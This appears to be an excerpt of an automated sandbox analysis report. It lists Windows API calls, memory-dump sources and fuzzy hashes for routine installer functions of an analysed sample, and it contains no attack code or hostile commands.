                                                                                                                            Function 0042285C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1631623395-0
                                                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418384 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004555E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 107509674-3733053543
                                                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D188 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CryptVersion
                                                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                            • API String ID: 1951258720-508647305
                                                                                                                            • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                            • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                                            • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                            • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004980A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                                            • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                                                            • API String ID: 134685335-3422211394
                                                                                                                            • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                            • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                                            • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                            • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00457594 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                                            Strings
                                                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                            • API String ID: 2236967946-3182603685
                                                                                                                            • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                                            • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                                            • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                                            • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455E0C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                            • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                            • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                                            • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                            • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417CD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                            • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                            • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                                            • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                            • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00464158 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                                            • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4011626565-0
                                                                                                                            • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                            • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                                            • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                            • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00463CDC Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                                            • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4011626565-0
                                                                                                                            • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                            • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                                            • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                            • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E934 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1177325624-0
                                                                                                                            • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                            • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                                            • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                            • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048393C Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 0048397A
                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$IconicLong
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2754861897-0
                                                                                                                            • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                            • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                                            • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                            • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00462750 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                                            • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
